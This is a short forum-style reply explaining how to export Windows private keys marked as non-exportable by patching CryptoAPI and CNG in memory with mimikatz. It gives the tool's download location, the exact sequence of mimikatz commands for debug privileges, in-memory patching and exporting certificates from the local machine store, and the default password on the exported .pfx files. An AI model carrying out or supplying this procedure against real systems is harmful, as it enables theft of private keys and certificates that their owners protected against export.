You’re right, no API at all that I’m aware to export PrivateKey marked as non-exportable.
But if you patch (in memory) normal APIs, you can use the normal way to export 🙂
There is a new version of mimikatz that also support CNG Export (Windows Vista / 7 / 2008 …)
- download (and launch with administrative privileges) : http://blog.gentilkiwi.com/mimikatz (trunk version or last version)
Run it and enter the following commands in its prompt:
privilege::debug(unless you already have it or target only CryptoApi)crypto::patchcng(nt 6) and/orcrypto::patchcapi(nt 5 & 6)crypto::exportCertificatesand/orcrypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE
The exported .pfx files are password protected with the password “mimikatz”